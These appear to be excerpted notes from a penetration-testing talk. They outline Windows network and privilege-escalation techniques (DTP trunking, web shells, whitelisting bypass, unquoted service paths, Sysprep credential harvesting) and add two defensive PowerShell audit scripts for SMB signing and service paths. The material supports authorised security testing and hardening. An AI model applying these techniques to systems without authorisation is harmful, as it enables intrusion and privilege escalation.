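A defender's check for the mitigation the note above relies on, added here as an example and not part of the talk: it reports, per host, whether SMB signing is merely enabled or actually required on the server and workstation sides, since only a server that requires signing rejects relayed sessions. The function name, the -ComputerName parameter, the placeholder host names and the use of WinRM (Invoke-Command) for remote hosts are assumptions; the registry values read are the standard LanmanServer / LanmanWorkstation settings.

```powershell
# Added example (not from the talk): report effective SMB signing settings.
function Get-SmbSigningState {
    [CmdletBinding()]
    param([string[]]$ComputerName = @($env:COMPUTERNAME))

    # Runs on each target; reads the same values Group Policy writes.
    $probe = {
        $base = 'HKLM:\SYSTEM\CurrentControlSet\Services'
        foreach ($role in 'LanmanServer', 'LanmanWorkstation') {
            $p = Get-ItemProperty -Path "$base\$role\Parameters" -ErrorAction SilentlyContinue
            $enabled  = $p.EnableSecuritySignature
            $required = $p.RequireSecuritySignature
            # A missing value means the OS default applies; on member servers and
            # workstations that default is "not required", so it counts as exposed.
            $enabledText  = if ($null -eq $enabled)  { 'default' } else { [bool]$enabled }
            $requiredText = if ($null -eq $required) { 'default' } else { [bool]$required }
            [pscustomobject]@{
                Computer     = $env:COMPUTERNAME
                Role         = $role
                Enabled      = $enabledText
                Required     = $requiredText
                # Relay works against a server that does not require signing,
                # whatever the client side is set to.
                RelayExposed = ($role -eq 'LanmanServer' -and $required -ne 1)
            }
        }
    }

    $onlyLocal = @($ComputerName).Count -eq 1 -and $ComputerName[0] -ieq $env:COMPUTERNAME
    if ($onlyLocal) {
        & $probe
    } else {
        # Remote hosts need WinRM enabled and the caller must be a local admin there.
        Invoke-Command -ComputerName $ComputerName -ScriptBlock $probe |
            Select-Object Computer, Role, Enabled, Required, RelayExposed
    }
}

# This host, then two file servers (placeholder names).
Get-SmbSigningState | Format-Table -AutoSize
Get-SmbSigningState -ComputerName 'FILESRV01', 'FILESRV02' | Format-Table -AutoSize
```

Any row with RelayExposed = True is a host the talk's "relay to other systems" scenario still works against; the fix is the "Microsoft network server: Digitally sign communications (always)" policy, which sets RequireSecuritySignature to 1.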
  12. Image showing MITM
  17. The unauthorized switch can send DTP frames and form a trunk with the company switch. If the attacker can establish a trunk link to the company switch, it receives traffic to all VLANs through the trunk, because all VLANs are allowed on a trunk by default.
  18–21. Image showing MITM
  22. Touch on common tools and pitfalls (account lockouts)
  23. Default and weak passwords for everything
  Tools: Nmap, Nessus, Web Scour, manuals, Google
  SQL injection
  Tools: manually, web scanners, SQL Ninja, SQLMap, Metasploit
  RFI / web shells (JBoss, Tomcat, etc.)
  Tools: Metasploit, FuzzDB, and other web shellery
  Web directory traversals
  Tools: manually, web scanners, FuzzDB, Metasploit
  Critical missing patches (SEP etc.)
  Tools: Metasploit, exploit-db exploits, etc.
  24. Execution via approved apps
  - PowerShell code injection
  - Rundll32
  - IEExec
  Directory exceptions - GAC
  Disable services
  Poisoning allowed file list and blocking updates via hosts file
  Poisoning updates
  25. This is a non-linear process, so be aware that some techniques can be used at many levels. These are the common escalation scenarios seen during penetration testing.
  26. Local user → Local Administrator
  Excessive local group privileges (admin or power users)
  Cleartext credentials
  - Sysprep (unattend.xml/ini/txt)
  - Config files, scripts, logs, desktop folders
  - Tech support call files
  Weak application configurations that allow:
  - Restarting or reconfiguring services
  - Replacing application files
  - DLL pre- or side-loading
  - Executable injection via poorly registered services: C:\Program Files (x86) vs “C:\Program Files (x86)”
  Local and remote exploits (Metasploit: getsystem)
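An audit for the unquoted service path issue named on slide 52 ("insecure service paths") and in the note above (C:\Program Files (x86) vs “C:\Program Files (x86)”), added here as an example and not part of the talk. It lists services whose ImagePath contains a space but no quotes, the alternate file names the service manager will try before the real binary, and whether ordinary users can create files in the folder where such a name would be looked up. The function name is an assumption; it should run as an administrator so Win32_Service and Get-Acl return complete data.

```powershell
# Added example (not from the talk): find unquoted service paths and rate them.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    # Principals whose create-file right on a folder means any user can plant a file.
    $broad  = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    $create = [System.Security.AccessControl.FileSystemRights]::CreateFiles

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { continue }

        # Keep only the executable; arguments after .exe do not matter here.
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups[1].Value
        if ($exe -notmatch ' ') { continue }   # no space: nothing to hijack

        # Each prefix ending just before a space, with ".exe" appended, is a
        # name the service manager tries before the real binary.
        $idx = $exe.IndexOf(' ')
        while ($idx -gt 0) {
            $cand = $exe.Substring(0, $idx) + '.exe'
            $dir  = Split-Path -Parent $cand
            $writable = $false
            if (Test-Path -LiteralPath $dir) {
                $writable = [bool](
                    (Get-Acl -LiteralPath $dir).Access | Where-Object {
                        $_.AccessControlType -eq 'Allow' -and
                        $broad -contains $_.IdentityReference.Value -and
                        ($_.FileSystemRights -band $create)
                    })
            }
            [pscustomobject]@{
                Service        = $svc.Name
                RunsAs         = $svc.StartName
                ImagePath      = $path
                Candidate      = $cand
                WritableByUser = $writable
            }
            $idx = $exe.IndexOf(' ', $idx + 1)
        }
    }
}

# Highest risk first: a SYSTEM service with a candidate in a user-writable folder.
Get-UnquotedServicePath | Sort-Object WritableByUser -Descending | Format-Table -AutoSize
```

A WritableByUser = True row for a service running as LocalSystem is the condition the talk describes; the remediation is to wrap the ImagePath value in quotes (for example with sc.exe config binPath=) and to remove the broad write permission from that folder.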
  30. Yes it did.